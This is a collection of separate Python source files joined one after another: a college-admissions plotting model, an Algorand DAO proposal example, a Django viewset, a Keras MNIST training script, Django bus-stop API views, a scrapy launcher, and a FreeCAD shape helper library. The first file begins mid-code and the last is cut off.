requests.delete('https://api.plot.ly/v2/files/' + username + ':' + plot_num +
'/permanent_delete', auth=auth, headers=headers)
data = ScattergramData.query.filter_by(college=self.name).all()
college_filename = self.name.replace(' ', '-').lower()
# GPA vs. SAT [2400]
SAT2400_Accepted = []
GPA_SAT2400_Accepted = []
SAT2400_Denied = []
GPA_SAT2400_Denied = []
SAT2400_Waitlisted1 = []
GPA_SAT2400_Waitlisted1 = []
SAT2400_Waitlisted2 = []
GPA_SAT2400_Waitlisted2 = []
SAT2400_Waitlisted3 = []
GPA_SAT2400_Waitlisted3 = []
# GPA vs. SAT [1600]
SAT1600_Accepted = []
GPA_SAT1600_Accepted = []
SAT1600_Denied = []
GPA_SAT1600_Denied = []
SAT1600_Waitlisted1 = []
GPA_SAT1600_Waitlisted1 = []
SAT1600_Waitlisted2 = []
GPA_SAT1600_Waitlisted2 = []
SAT1600_Waitlisted3 = []
GPA_SAT1600_Waitlisted3 = []
# GPA vs. ACT
ACT_Accepted = []
GPA_ACT_Accepted = []
ACT_Denied = []
GPA_ACT_Denied = []
ACT_Waitlisted1 = []
GPA_ACT_Waitlisted1 = []
ACT_Waitlisted2 = []
GPA_ACT_Waitlisted2 = []
ACT_Waitlisted3 = []
GPA_ACT_Waitlisted3 = []
for i in range(len(data)):
if(data[i].SAT2400):
if(data[i].status == 'Accepted'):
SAT2400_Accepted.append(int(data[i].SAT2400))
GPA_SAT2400_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
SAT2400_Denied.append(int(data[i].SAT2400))
GPA_SAT2400_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
SAT2400_Waitlisted1.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
SAT2400_Waitlisted2.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
SAT2400_Waitlisted3.append(int(data[i].SAT2400))
GPA_SAT2400_Waitlisted3.append(data[i].GPA)
if(data[i].SAT1600):
if(data[i].status == 'Accepted'):
SAT1600_Accepted.append(int(data[i].SAT1600))
GPA_SAT1600_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
SAT1600_Denied.append(int(data[i].SAT1600))
GPA_SAT1600_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
SAT1600_Waitlisted1.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
SAT1600_Waitlisted2.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
SAT1600_Waitlisted3.append(int(data[i].SAT1600))
GPA_SAT1600_Waitlisted3.append(data[i].GPA)
if(data[i].ACT):
if(data[i].status == 'Accepted'):
ACT_Accepted.append(int(data[i].ACT))
GPA_ACT_Accepted.append(data[i].GPA)
elif(data[i].status == 'Denied'):
ACT_Denied.append(int(data[i].ACT))
GPA_ACT_Denied.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Accepted)'):
ACT_Waitlisted1.append(int(data[i].ACT))
GPA_ACT_Waitlisted1.append(data[i].GPA)
elif(data[i].status == 'Waitlisted/Deferred (Denied)'):
ACT_Waitlisted2.append(int(data[i].ACT))
GPA_ACT_Waitlisted2.append(data[i].GPA)
if(data[i].status == 'Waitlisted/Deferred (Withdrew App)'):
ACT_Waitlisted3.append(int(data[i].ACT))
GPA_ACT_Waitlisted3.append(data[i].GPA)
# Create a trace
trace0 = go.Scatter(
x=SAT2400_Accepted,
y=GPA_SAT2400_Accepted,
mode='markers',
name="Accepted"
)
trace1 = go.Scatter(
x=SAT2400_Denied,
y=GPA_SAT2400_Denied,
mode='markers',
name="Denied"
)
trace2 = go.Scatter(
x=SAT2400_Waitlisted1,
y=GPA_SAT2400_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace3 = go.Scatter(
x=SAT2400_Waitlisted2,
y=GPA_SAT2400_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace4 = go.Scatter(
x=SAT2400_Waitlisted3,
y=GPA_SAT2400_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout1 = go.Layout(
title='{}: SAT [2400] vs. GPA'.format(self.name),
xaxis=dict(
title='SAT [2400]'
),
yaxis=dict(
title='GPA',
)
)
fig1 = go.Figure(data=[trace0, trace1, trace2,
trace3, trace4], layout=layout1)
self.plot_SAT2400 = py.plot(
fig1, filename=college_filename + '-sat2400', auto_open=False)
# Create a trace
trace5 = go.Scatter(
x=SAT1600_Accepted,
y=GPA_SAT1600_Accepted,
mode='markers',
name="Accepted"
)
trace6 = go.Scatter(
x=SAT1600_Denied,
y=GPA_SAT1600_Denied,
mode='markers',
name="Denied"
)
trace7 = go.Scatter(
x=SAT1600_Waitlisted1,
y=GPA_SAT1600_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace8 = go.Scatter(
x=SAT1600_Waitlisted2,
y=GPA_SAT1600_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace9 = go.Scatter(
x=SAT1600_Waitlisted3,
y=GPA_SAT1600_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout2 = go.Layout(
title='{}: SAT [1600] vs. GPA'.format(self.name),
xaxis=dict(
title='SAT1600'
),
yaxis=dict(
title='GPA',
)
)
fig2 = go.Figure(data=[trace5, trace6, trace7,
trace8, trace9], layout=layout2)
self.plot_SAT1600 = py.plot(
fig2, filename=college_filename + '-sat1600', auto_open=False)
# Create a trace
trace10 = go.Scatter(
x=ACT_Accepted,
y=GPA_ACT_Accepted,
mode='markers',
name="Accepted"
)
trace11 = go.Scatter(
x=ACT_Denied,
y=GPA_ACT_Denied,
mode='markers',
name="Denied"
)
trace12 = go.Scatter(
x=ACT_Waitlisted1,
y=GPA_ACT_Waitlisted1,
mode='markers',
name="Waitlisted/Deferred (Accepted)"
)
trace13 = go.Scatter(
x=ACT_Waitlisted2,
y=GPA_ACT_Waitlisted2,
mode='markers',
name="Waitlisted/Deferred (Denied)"
)
trace14 = go.Scatter(
x=ACT_Waitlisted3,
y=GPA_ACT_Waitlisted3,
mode='markers',
name="Waitlisted/Deferred (Withdrew App)"
)
layout3 = go.Layout(
title='{}: ACT vs. GPA'.format(self.name),
xaxis=dict(
title='ACT'
),
yaxis=dict(
title='GPA',
)
)
fig3 = go.Figure(data=[trace10, trace11, trace12,
trace13, trace14], layout=layout3)
self.plot_ACT = py.plot(
fig3, filename=college_filename + '-act', auto_open=False)
@staticmethod
def get_college_by_name(name):
return College.query.filter_by(name=name).first()
@staticmethod
def insert_colleges():
college_names = {
'University of Pennsylvania', 'Columbia University',
'Stanford University', 'Princeton University',
'Harvard University', 'Cornell University', 'Yale University',
'Brown University', 'Dartmouth College', 'New York University',
'University of California, Berkeley',
'University of California, Los Angelos', 'University of Michigan',
'Carnegie Mellon University', 'John Hopkins University',
'University of Chicago', 'Amherst College', 'Williams College',
'Massachusetts Institute of Technology',
'Georgia Institute of Technology',
'California Institute of Technology', 'Duke University'
}
early_deadlines = [
datetime(2017, 11, 4),
datetime(2017, 11, 3),
datetime(2017, 10, 26),
datetime(2017, 11, 1),
datetime(2017, 11, 11),
datetime(2017, 11, 13),
datetime(2017, 10, 29)
]
regular_deadlines = [
datetime(2017, 12, 31),
datetime(2017, 1, 1),
datetime(2017, 1, 2),
datetime(2017, 1, 3),
datetime(2017, 1, 5),
datetime(2017, 2, 1),
datetime(2017, 1, 14)
]
descriptions = [
'Private research university', 'Ivy League university',
'Liberal arts college', 'Public research university',
'Private doctorate university'
]
costs_of_attendance = [
60000, 50000
]
tuitions = [
50000, 16000, 24000
]
room_and_boards = [
10000, 15000, 8000
]
images = [
'http://www.collegerank.net/wp-content/uploads/2015/08/morehouse-college-quad.jpg',
'https://static1.squarespace.com/static/52f11228e4b0a96c7b51a92d/t/55e705bee4b03fc234f02b5e/1441203647587/'
]
for c in college_names:
college = College.get_college_by_name(c)
if college is None:
college = College(
name=c,
description=random.choice(descriptions),
cost_of_attendance=random.choice(costs_of_attendance),
tuition=random.choice(tuitions),
room_and_board=random.choice(room_and_boards),
regular_deadline=random.choice(regular_deadlines),
early_deadline=random.choice(early_deadlines),
image=random.choice(images))
db.session.add(college)
db.session.commit()
def __repr__(self):
return '<College: {}>'.format(self.name)
|
"""
End-to-end example of creating a DAO, submitting a PAYMENT proposal,
successfully passing the proposal, and then implementing it using the
on-chain logic.
"""
import algosdk.logic
import algodao.assets
import algodao.helpers
import tests.helpers
from algodao.committee import Committee
from algodao.governance import PreapprovalGate, AlgoDao
from algodao.voting import ProposalType, VoteType, ElectionToken, Proposal
algodao.helpers.loggingconfig()
# set up the creator's account
algod = algodao.helpers.createclient()
creatorprivkey, creatoraddr = tests.helpers.create_funded(algod)
# create the trust committee
committee = Committee.CreateCommittee("Trusted", 5)
deployedcommittee = Committee.deploy(algod, committee, creatorprivkey)
committee_addr = algosdk.logic.get_application_address(deployedcommittee.appid)
# the committee needs some funding in order to initialize a new token (the
# committee token, which indicates membership)
tests.helpers.fund_account(algod, committee_addr)
deployedcommittee.call_inittoken(algod, creatorprivkey, creatoraddr)
algodao.helpers.optinasset(algod, creatoraddr, creatorprivkey, deployedcommittee.assetid)
# for simplicity in this example, the creator of the DAO is the only member
# of the trust committee
deployedcommittee.call_setmembers(algod, creatorprivkey, creatoraddr, [creatoraddr])
# create the governance token
gov_count = 1000000
gov_asset_id = algodao.assets.createasset(
algod,
creatoraddr,
creatorprivkey,
algodao.assets.createmetadata(
"My Governance Token",
"Governance token for My DAO",
{},
"",
),
gov_count,
"DAOGOV",
"MyDAO Governance",
"https://localhost/MyDAO/tokens/governance",
)
# create the preapproval gate with a single member
creategate = PreapprovalGate.CreateGate(deployedcommittee.appid, 1)
gate = PreapprovalGate.deploy(algod, creategate, creatorprivkey)
algodao.helpers.optinapp(algod, creatorprivkey, creatoraddr, gate.appid)
gate_addr = algosdk.logic.get_application_address(gate.appid)
# the preapproval gate also needs funding to create its token (the trust token)
tests.helpers.fund_account(algod, gate_addr)
gate.call_inittoken(
algod,
creatoraddr,
creatorprivkey,
100,
"Trusted",
"TRUST",
'http://localhost/abcd'
)
# create the DAO
dao = AlgoDao.CreateDao("My DAO", gate.trust_assetid)
deployeddao = AlgoDao.deploy(algod, dao, creatorprivkey)
# add a rule specifying that PAYMENT proposals must be passed by a governance
# vote, with a 60% approval in order to pass (no minimum vote count or quorum
# requirements are currently implemented)
deployeddao.call_addrule(
algod,
creatoraddr,
creatorprivkey,
ProposalType.PAYMENT,
VoteType.GOVERNANCE_TOKEN,
60
)
# fund the DAO treasury
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(deployeddao.appid))
# finalize the DAO - at this point no further updates are allowed by the
# creator; all further updates must be approved by the governance rules through
# a Proposal (not yet implemented)
deployeddao.call_finalize(algod, creatoraddr, creatorprivkey)
# create the election token. the election token is distributed to governance
# token holders according to the governance2votes lambda (here we simply define
# a 1-to-1 mapping) and are deposited into the Proposal contract to
# represent votes.
lastround = algod.status()['last-round']
voting_rounds = 40
waitforround = lastround + voting_rounds + 1
beginreg = lastround
endreg = lastround + voting_rounds
indexer = algodao.helpers.indexer_client()
election = algodao.voting.Election(
indexer,
algodao.voting.GovernanceToken(gov_asset_id),
None,
lambda govvotes: govvotes, # provide 1 election token per gov token
beginreg,
endreg,
)
# build the Merkle tree to distribute election tokens to governance token
# holders in accordance with a current snapshot of holding amounts
createtree = election.builddistribution()
appid = createtree.deploy(algod, creatorprivkey)
deployedtree = algodao.assets.TokenDistributionTree.DeployedTree(
appid, createtree.addr2count, createtree.merkletree
)
# the distribution tree contract requires funds to initialize the election
# token
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(appid))
election_assetid = deployedtree.call_inittoken(
algod,
creatoraddr,
creatorprivkey,
gov_count,
"ELEC",
"MyDao Election Token",
"https://localhost/MyDao/tokens/election"
)
# opt into the election token and claim our share
algodao.helpers.optinasset(algod, creatoraddr, creatorprivkey, election_assetid)
deployedtree.call_claim(algod, creatoraddr, creatorprivkey)
electiontoken = ElectionToken(election_assetid)
# create the proposal (pay 10,000 microalgo to receiveraddr)
receiverprivkey, receiveraddr = tests.helpers.create_funded(algod)
amount = 10000
proposal = Proposal.CreateProposal(
"Test Proposal",
electiontoken,
lastround,
lastround + voting_rounds,
lastround,
lastround + voting_rounds,
2, # number of options; must be 2 for an up/down vote
deployeddao.appid,
ProposalType.PAYMENT,
)
proposal.setpaymentinfo(receiveraddr, 10000)
proposal.setvotedata(VoteType.GOVERNANCE_TOKEN, 60)
deployedproposal = Proposal.deploy(algod, proposal, creatorprivkey)
# the Proposal contract requires funds to opt into the trust token and the
# election token
tests.helpers.fund_account(algod, algosdk.logic.get_application_address(deployedproposal.appid))
deployedproposal.call_optintoken(algod, creatoraddr, creatorprivkey, gate.trust_assetid)
deployedproposal.call_optintoken(algod, creatoraddr, creatorprivkey, electiontoken.asset_id)
# have the preapproval committee assess and preapprove the proposal
gate.call_assessproposal(algod, creatoraddr, creatorprivkey, deployedproposal.appid)
gate.call_vote(algod, creatoraddr, creatorprivkey, deployedproposal.appid, 1)
# vote on the proposal
algodao.helpers.optinapp(algod, creatorprivkey, creatoraddr, deployedproposal.appid)
deployedproposal.call_vote(
algod,
creatoraddr,
creatorprivkey,
1, # vote option 1 = Yes, 2 = No
10 # 10 votes
)
# wait for the voting period to end
algodao.helpers.wait_for_round(algod, waitforround)
# finalize the vote (assesses whether the vote passed or not)
deployedproposal.call_finalizevote(algod, creatoraddr, creatorprivkey)
# implement the (now passed) proposal from the DAO-side. the DAO contract will
# verify that the election has ended and that the proposal has passed in
# accordance with the requirements for this proposal type set by the DAO (i.e.,
# that it was a governance vote with over 60% voting Yes)
before = algod.account_info(receiveraddr)
deployeddao.call_implementproposal(
algod,
deployedproposal,
creatoraddr,
creatorprivkey,
accounts=[receiveraddr],
)
after = algod.account_info(receiveraddr)
print(f"Before implementing proposal, receiver account: {before}")
print(f"After implementing proposal, receiver amount: {after}")
|
from ...models.models import Model
from ...serialisers.models import ModelSerialiser
from ...permissions import IsAuthenticated, AllowNone
from ..mixins import DownloadableViewSet, SetFileViewSet, SoftDeleteViewSet
from .._UFDLBaseViewSet import UFDLBaseViewSet
class ModelViewSet(SetFileViewSet, DownloadableViewSet, SoftDeleteViewSet, UFDLBaseViewSet):
queryset = Model.objects.all()
serializer_class = ModelSerialiser
permission_classes = {
"list": IsAuthenticated,
"create": AllowNone,
"retrieve": IsAuthenticated,
"update": AllowNone,
"partial_update": AllowNone,
"destroy": AllowNone,
"set_file": AllowNone,
"delete_file": AllowNone,
"download": IsAuthenticated,
"hard_delete": AllowNone,
"reinstate": AllowNone
}
|
import keras
from keras.datasets import mnist
from keras.utils import np_utils
from keras.layers import Dense, Dropout, Activation, Flatten
from keras.models import Sequential
import matplotlib.pyplot as plt
# 保存模型,权重
import tempfile
from keras.models import save_model, load_model
import numpy as np
def load_data(path='mnist.npz'):
f = np.load(path)
x_train, y_train = f['x_train'], f['y_train']
x_test, y_test = f['x_test'], f['y_test']
f.close()
return (x_train, y_train), (x_test, y_test)
# 将数据读入
(x_train, y_train), (x_test, y_test) = load_data()
print(x_train.shape,y_train.shape,x_test.shape,y_test.shape)
# plot 4 images as gray scale
# plt.subplot(221)
# print(y_train[4545],y_train[1],y_train[2],y_train[3])
# plt.imshow(x_train[4545], cmap=plt.get_cmap('gray'))
# plt.subplot(222)
# plt.imshow(x_train[1], cmap=plt.get_cmap('gray'))
# plt.subplot(223)
# plt.imshow(x_train[2], cmap=plt.get_cmap('gray'))
# plt.subplot(224)
# plt.imshow(x_train[3], cmap=plt.get_cmap('gray'))
# # show the plot
# plt.show()
X_train = x_train.reshape(x_train.shape[0], 784)
X_test = x_test.reshape(x_test.shape[0],784)
X_train = X_train.astype('float32')
X_test = X_test.astype('float32')
# print(X_train.shape,X_test.shape)
# print(X_train.dtype,X_test.dtype)
# 归一化
X_train /= 255
X_test /= 255
# 对于y 独热编码
Y_train = np_utils.to_categorical(y_train, 10)
Y_test = np_utils.to_categorical(y_test, 10)
# 初始化序列模型:
model = Sequential()
#model.add(Dense(10,input_dim=784))
#model.add(Activation('softmax'))
model.add(Dense(128,input_dim=784,activation='relu'))
model.add(Dense(128,activation='relu'))
model.add(Dense(10,activation='softmax'))
#model.summary()
model.compile(optimizer=keras.optimizers.sgd(),
loss='categorical_crossentropy',
metrics=['accuracy'])
# 训练模型
model.fit(X_train, Y_train, nb_epoch=20, batch_size=128,verbose=1,validation_split=0.2)
model.save('mnist_kerasModel.h5')
#测试模型
print('\nTesting ------------')
loss, accuracy = model.evaluate(X_test, Y_test,verbose=1)
print('test loss: ', loss)
print('test accuracy: ', accuracy) |
import os
import random
import tempfile
import uuid
import json
from django.http import JsonResponse
from django.http import HttpResponse
from rest_framework.views import APIView
from django.views.decorators.csrf import csrf_exempt
import time as processTiming
from datetime import timedelta, datetime, time, date
from rest_framework.decorators import api_view
from django.shortcuts import render
from ..fetch_busapi import FetchBusApi
# API to fetch bus stops, used by frontend.
class BusStopsLocations(APIView):
@classmethod
def get(self, request, bus_stops_locations=FetchBusApi()):
startTime = processTiming.time()
call_uuid = uuid.uuid4()
ID = "BUS_STOPS_INFO"
result = bus_stops_locations.bus_stand_locations()
return JsonResponse(
{
"API_ID": ID,
"CALL_UUID": call_uuid,
"DATA": {
"RESULT": result
},
"TIMESTAMP": "{} seconds".format(float(round(processTiming.time() - startTime, 2)))}
)
# API to fetch bus timings at stops, used by frontend. The results consist of bus timings for all bus trips.
class BusTripsTimings(APIView):
@classmethod
def get(self, request, bus_stops_timings=FetchBusApi()):
startTime = processTiming.time()
call_uuid = uuid.uuid4()
ID = "BUS_STOPS__TIME_INFO"
result = bus_stops_timings.bus_trips_timings()
return JsonResponse(
{
"API_ID": ID,
"CALL_UUID": call_uuid,
"DATA": {
"RESULT": result
},
"TIMESTAMP": "{} seconds".format(float(round(processTiming.time() - startTime, 2)))}
)
|
from scrapy.crawler import CrawlerProcess
from .spiders import amazon_scraper
process = CrawlerProcess()
process.crawl(amazon_scraper)
process.start()
|
import sys
FREECADPATH = '/usr/lib/freecad/lib'
sys.path.append(FREECADPATH)
import FreeCAD, FreeCADGui, Part, PartGui
##############################
## LIBRARIES
##############################
SCREWS = {
## name, screw dim, head radius, hole radius, spacer dim
## screw dim: angle, radius, height, thickness, measurement
## spacer dim: number of sides, poly radius, inner hole radius (w/o thread)
## screw 6-32
"6_32_0p25": ([360, 4.0/64, 0.25, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_0p50": ([360, 4.0/64, 0.50, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_0p75": ([360, 4.0/64, 0.75, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
"6_32_1p00": ([360, 4.0/64, 1.00, 0, "inch"], 7.5/64, 4.5/64, (6, 5.0/32, 2.5/32, "inch")),
## screw 4-40
"4_40_0p25": ([360, 3.0/64, 0.25, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_0p50": ([360, 3.0/64, 0.50, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_0p75": ([360, 3.0/64, 0.75, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch")),
"4_40_1p00": ([360, 3.0/64, 1.00, 0, "inch"], 6.5/64, 3.5/64, (6, 5.0/32, 2.0/32, "inch"))
}
##===================================================
##
## FUNCTIONS
##
##===================================================
########################################
## Fuser
########################################
def fuser(fusion_name, base, tool):
docGctive = FreeCADGui.ActiveDocument
FreeCAD.Console.PrintMessage("===============FUSER=============\n")
FreeCAD.Console.PrintMessage("Fuse: " + fusion_name + "\n")
FreeCAD.Console.PrintMessage("Base: %s, %s\n" % (base.Name, base.Label))
FreeCAD.Console.PrintMessage("Tool: %s, %s\n" % (tool.Name, tool.Label))
FreeCAD.activeDocument().addObject("Part::Fuse", fusion_name)
FreeCAD.activeDocument().getObject(fusion_name).Base = base
FreeCAD.activeDocument().getObject(fusion_name).Tool = tool
FreeCADGui.activeDocument().hide(base.Name)
FreeCADGui.activeDocument().hide(tool.Name)
FreeCAD.Console.PrintMessage("Hide: %s, %s\n" % (base.Name, tool.Name))
docGctive.getObject(fusion_name).ShapeColor=docGctive.getObject(base.Name).ShapeColor
docGctive.getObject(fusion_name).DisplayMode=docGctive.getObject(base.Name).DisplayMode
FreeCAD.Console.PrintMessage("============END FUSER=============\n")
########################################
## Cutter
########################################
def cutter(cut_name, base, tool):
docGctive = FreeCADGui.ActiveDocument
FreeCAD.Console.PrintMessage("===============CUTTER=============\n")
FreeCAD.Console.PrintMessage("Cut: " + cut_name + "\n")
FreeCAD.Console.PrintMessage("Base: %s, %s\n" % (base.Name, base.Label))
FreeCAD.Console.PrintMessage("Tool: %s, %s\n" % (tool.Name, tool.Label))
FreeCAD.activeDocument().addObject("Part::Cut", cut_name)
FreeCAD.activeDocument().getObject(cut_name).Base = base
FreeCAD.activeDocument().getObject(cut_name).Tool = tool
FreeCADGui.activeDocument().hide(base.Name)
FreeCADGui.activeDocument().hide(tool.Name)
FreeCAD.Console.PrintMessage("Hide: %s, %s\n" % (base.Name, tool.Name))
docGctive.getObject(cut_name).ShapeColor=docGctive.getObject(base.Name).ShapeColor
docGctive.getObject(cut_name).DisplayMode=docGctive.getObject(base.Name).DisplayMode
FreeCAD.Console.PrintMessage("============END CUTTER=============\n")
########################################
## Placer
########################################
def placer(x,y,z,a,ax,ay,az):
FreeCAD.Console.PrintMessage("===============PLACER=============\n")
msg = "x: %.2f, y: %.2f, z: %.2f, a: %.2f, ax: %.2f, ay: %.2f, az: %.2f\n"
FreeCAD.Console.PrintMessage(msg % (x, y, z, a, ax, ay, az))
p = FreeCAD.Placement(FreeCAD.Vector(x, y, z), FreeCAD.Rotation(a, ax, ay, az))
FreeCAD.Console.PrintMessage("============END PLACER=============\n")
return p
##===================================================
##
## CLASSES
##
##===================================================
########################################
##
## FreeCAD related parameters
##
########################################
class CADobj():
""" Basic CAD object """
def __init__(self,docname,objtype,objname):
self.doc = docname
self.obj = objtype
self.name = objtype[6:]+"_"+objname
self.lx = 0
self.ly = 0
self.lz = 0
self.weight = 0
def cprint(self, strin):
""" Print to CAD console """
FreeCAD.Console.PrintMessage(strin + "\n")
def show(self):
""" Print info for this object """
self.cprint(self.name + ", in doc: " + self.doc)
self.cprint(self.name + ", loc: %.2f %.2f %.2f" % (self.lx, self.ly, self.lz))
self.cprint(self.name + ", weight: %.2f" % self.weight)
def select(self):
""" Update current document to allow obj selection """
try :
tmp = FreeCAD.getDocument(self.doc)
except NameError:
self.cprint(self.name + ", Need new doc " + self.doc)
FreeCAD.newDocument(self.doc)
self.cprint(self.name + ", move to doc " + self.doc)
FreeCAD.setActiveDocument(self.doc)
self.docA = FreeCAD.ActiveDocument
self.docG = FreeCADGui.ActiveDocument
def create(self):
""" Create the obj in CAD """
self.cprint("============ CREATE ==============")
self.cprint(self.name + ", create this obj")
self.select()
self.docA.addObject(self.obj, self.name)
self.docA.recompute()
self.objA = self.docA.getObject(self.name)
self.objG = self.docG.getObject(self.name)
self.cprint("============END CREATE=============")
def loc(self, x,y,z):
""" Modify location of obj in CAD """
self.cprint(self.name + ", move obj to %.2f %.2f %.2f" % (x,y,z))
self.objA.Placement = FreeCAD.Placement(FreeCAD.Vector(x,y,z),FreeCAD.Rotation(0,0,0,1))
self.lx = x
self.ly = y
self.lz = z
def color(self,r,g,b):
""" Modify color in CAD """
self.objG.ShapeColor = (r,g,b)
########################################
##
## Any 3D object, extension of CAD object
##
########################################
class obj3d(CADobj):
""" Basic shape class for CAD drawing """
def __init__(self,doc,t,n,x,y,z,th):
CADobj.__init__(self, doc, t, n)
self.dx = x
self.dy = y
self.dz = z
self.thick = th
def fillet(self, arr):
name_org = self.name
self.obj = "Part::Fillet"
self.name = obj[6:]+"_"+self.name
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", fillets: ")
FreeCAD.Console.PrintMessage(arr)
self.cprint("")
CADobj.create(self)
self.objA.Base = self.docA.getObject(name_org)
self.objA.Edges = arr
self.docG.getObject(name_org).Visibility = False
def hollow(self, arr):
self.cprint("============HOLLOW=============\n")
name_org = self.name
self.thick = arr[0]
self.obj = "Part::Thickness"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", faces: ")
FreeCAD.Console.PrintMessage(arr[3])
self.cprint("")
self.objA.Faces = (self.docA.getObject(name_org), arr[3])
self.objA.Value = self.thick
self.objA.Mode = arr[1]
self.objA.Join = arr[2]
self.objA.Intersection = False
self.objA.SelfIntersection = False
self.docA.recompute()
self.docG.getObject(name_org).Visibility = False
self.cprint("============END HOLLOW=============\n")
def extrude(self, arr):
self.cprint("============EXTRUDE=============\n")
name_org = self.name
self.obj = "Part::Extrusion"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", faces: ")
FreeCAD.Console.PrintMessage(arr)
self.cprint("")
self.objA.Base = self.docA.getObject(name_org)
self.objA.Dir = arr[0]
self.objA.Solid = arr[1]
self.objA.TaperAngle = arr[2]
self.docA.recompute()
self.docG.getObject(name_org).Visibility = False
self.cprint("============END EXTRUDE=============\n")
def cut(self, name_cut):
self.cprint("============CUT=============\n")
name_org = self.name
self.obj = "Part::Cut"
self.name = self.obj[6:]+"_"+self.name
CADobj.create(self)
self.cprint(self.name + ", old name: " + name_org)
self.cprint(self.name + ", cut from: " + name_cut)
self.objA.Base = self.docA.getObject(name_org)
self.objA.Tool = self.docA.getObject(name_cut)
self.docG.hide(name_org)
self.docG.hide(name_cut)
self.objG.ShapeColor = self.docG.getObject(name_org).ShapeColor
self.objG.DisplayMode = self.docG.getObject(name_org).DisplayMode
self.cprint("============END CUT=============\n")
########################################
##
## Box representation
##
########################################
class box(obj3d):
""" Box for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0] if (dim[4] == "mm") else dim[0]*25.4
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::Box", n,x,y,z,t)
def show(self):
""" Print dimension of the box """
CADobj.show(self)
self.cprint("============SHOW BOX=============\n")
msg = "%s, (in mm) length: %.2f, width: %.2f, depth: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPING=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.cprint("Obj name " + self.name + ", " + self.objA.Name)
self.objA.Length = self.dx
self.objA.Width = self.dy
self.objA.Height = self.dz
self.cprint("Done re-shaping " + self.name)
self.cprint("============END RESHAPING=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating "+ self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating " + self.name)
########################################
##
## Cylinder representation
##
########################################
class cylinder(obj3d):
""" Cylinder for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0]
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::Cylinder", n,x,y,z,t)
def show(self):
""" Print dimension of the box """
CADobj.show(self)
self.cprint("============SHOW CYLINDER=============\n")
msg = "%s, (in mm) angle: %.2f, radius: %.2f, height: %.2f, thick: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz, self.thick))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPE=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.objA.Angle = self.dx
self.objA.Radius = self.dy
self.objA.Height = self.dz
self.cprint("Done re-shaping obj")
self.cprint("============END RESHAPE=============\n")
def create(self):
""" Create this obj in CAD """
self.cprint("Creating obj " + self.name)
CADobj.create(self)
self.reshape()
self.docG.sendMsgToViews("ViewFit")
self.cprint("Done creating obj")
########################################
##
## Polygon representation
##
########################################
class polygon(obj3d):
""" Polygon for CAD drawing """
def __init__(self,doc,n,dim):
x = dim[0]
y = dim[1] if (dim[4] == "mm") else dim[1]*25.4
z = dim[2] if (dim[4] == "mm") else dim[2]*25.4
t = dim[3] if (dim[4] == "mm") else dim[3]*25.4
obj3d.__init__(self, doc, "Part::RegularPolygon", n,x,y,z,t)
def show(self):
""" Print dimension of the polygon """
self.cprint("============SHOW POLYGON=============\n")
CADobj.show(self)
msg = "%s, (in mm) num_sides: %.2f, radius: %.2f, height: %.2f, thick: %.2f"
self.cprint(msg % (self.name, self.dx, self.dy, self.dz, self.thick))
self.cprint("============END SHOW=============\n")
def reshape(self):
""" Update its dimension in CAD """
self.cprint("============RESHAPE=============\n")
self.cprint("Re-shaping " + self.name)
CADobj.select(self)
self.objA.Polygon = self.dx
self.objA.Circumradius = self.dy
self.cprint("Done Re-shaping obj")
